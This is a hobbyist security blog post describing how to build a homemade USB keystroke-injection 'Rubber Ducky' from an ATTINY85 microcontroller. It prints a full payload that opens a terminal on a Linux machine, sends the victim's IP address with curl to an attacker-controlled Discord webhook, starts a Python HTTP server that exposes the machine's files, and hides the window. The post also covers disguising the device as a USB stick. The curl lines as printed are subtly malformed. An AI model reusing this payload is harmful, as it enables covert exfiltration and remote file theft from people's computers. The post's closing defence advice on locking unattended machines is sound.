Nichols and Sense

All Things Coding and CyberSecurity

Making a Homemade Rubber Ducky

Posted on August 01, 2025

This is a project that I have wanted to make for a long time. A few years ago, I heard about a device called a "Rubber Ducky." This is a device that by all appearances, seems to be just a normal USB drive. Inside of it however is something much more terrifying. When it is plugged into any computer, it pretends to be a keyboard, then it can type out anything that you have programmed it to. I'm sure many people are thinking, "What's so scary about that?" It turns out that you can do a lot of damage with just a few seconds of keyboard access, and I'm going to show an example in this post. The official Rubber Ducky is over $100 and there's no way I'm spending that much, so I looked into how hard it would be to create my own. With a little bit of know how, you can actually make one yourself for less than $15. 

Before I go any further, I want to stress that all of this is just for educational purposes. I do not plan on ever using this device on any computer besides my own, and I do not condone the use of these for anything other than education. I have also intentionally left out some crucial steps in creating one of these so that no one can just read this post and copy it. I also made this device only target Linux devices so it is useless for hacking most computers. I could easily modify it to target Windows computers though. If you really want to make one yourself, this will point you in the right direction but you're going to have to do some research yourself as well. With that out of the way, let's get started.

Hardware

The first thing we are going to need is the physical device device that plugs into the computer. For this I have chosen the ATTINY85 microcontroller.

processing image

This is a very small microcontroller that only costs around $10 and already has a USB access on the PCB. We are able to plug in this device to our own computer, upload our code to the microcontroller, then have it execute it's payload any time it detects that it has been plugged into a computer. I'm not going to go into exactly how to do this, but there are resources online if you look hard enough.

The Payload

Now that we have a working device, what do we do with it? Honestly the sky is the limit, but this was my idea. When the device is plugged into a computer, it will open a new terminal, grab the IP address of the computer, send that IP address to a webhook that I control, then start a http server that can be connected to remotely. So how would we do that? Here is the final script, and let's take it a step at a time. 

#include "DigiKeyboard.h"

void setup() {
  DigiKeyboard.delay(3000);
  DigiKeyboard.sendKeyStroke(KEY_T, MOD_CONTROL_LEFT | MOD_ALT_LEFT);
  DigiKeyboard.delay(1000);
  DigiKeyboard.print("a=$(ip -br address | tr -d '\\n')");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(1000);
  DigiKeyboard.print(R"(curl -X POST -H "Content-Type: application/json" -d "{\"content\": \"$a\"}" https://discord.com/api/webhooks/MyWebhook;
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(1000);
  DigiKeyboard.print("python3 -m http.server");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_H, MOD_GUI_LEFT);
}

void loop() {
  // empty
}

First we want to wait a few seconds for our microcontroller to make a connections, then we open the terminal by sending the keystrokes "Ctrl+Alt+T"

DigiKeyboard.delay(3000);
 DigiKeyboard.sendKeyStroke(KEY_T, MOD_CONTROL_LEFT | MOD_ALT_LEFT);

We use a short delay again to let the terminal open before grabbing the IP address of the computer

DigiKeyboard.print("a=$(ip -br address | tr -d '\\n')");
 DigiKeyboard.sendKeyStroke(KEY_ENTER);

Next we send this IP address to a Discord webhook that I have created. Below is also a screenshot of my webhook displaying the IP address. Again I am not showing how to do this, but there are resources online.

DigiKeyboard.print(R"(curl -X POST -H "Content-Type: application/json" -d "{\"content\": \"$a\"}" https://discord.com/api/webhooks/MyWebhook;
DigiKeyboard.sendKeyStroke(KEY_ENTER);

processing image

Next we start a simple http server with Python

DigiKeyboard.print("python3 -m http.server");
DigiKeyboard.sendKeyStroke(KEY_ENTER);

Finally we hide the terminal window by sending the keystrokes "Super+H"

DigiKeyboard.sendKeyStroke(KEY_H, MOD_GUI_LEFT);

We now how access to all the files on this computer computer until the terminal is closed or the computer is restarted.

Here is a quick demonstration of how fast this occurs on the target computer.

processing image

 

And here is the the http server that I now have access to where I can download any file I want from the computer.

processing image

The only thing that is left to do is put this device inside a case so that we can disguise it as a normal USB stick. Here is one that I had 3D printed.

processing image

 

Defense

So how would you avoid being hacked by one of these devices? Luckily the answer is very simple; Never leave your computer unlocked and unattended. If you ever have to leave your computer for any reason while others are around, always make sure you lock it and return the the login menu before leaving. Without the computer being unlocked, these devices are useless.

I hope you enjoyed this post! Stay tuned for more cool projects like this.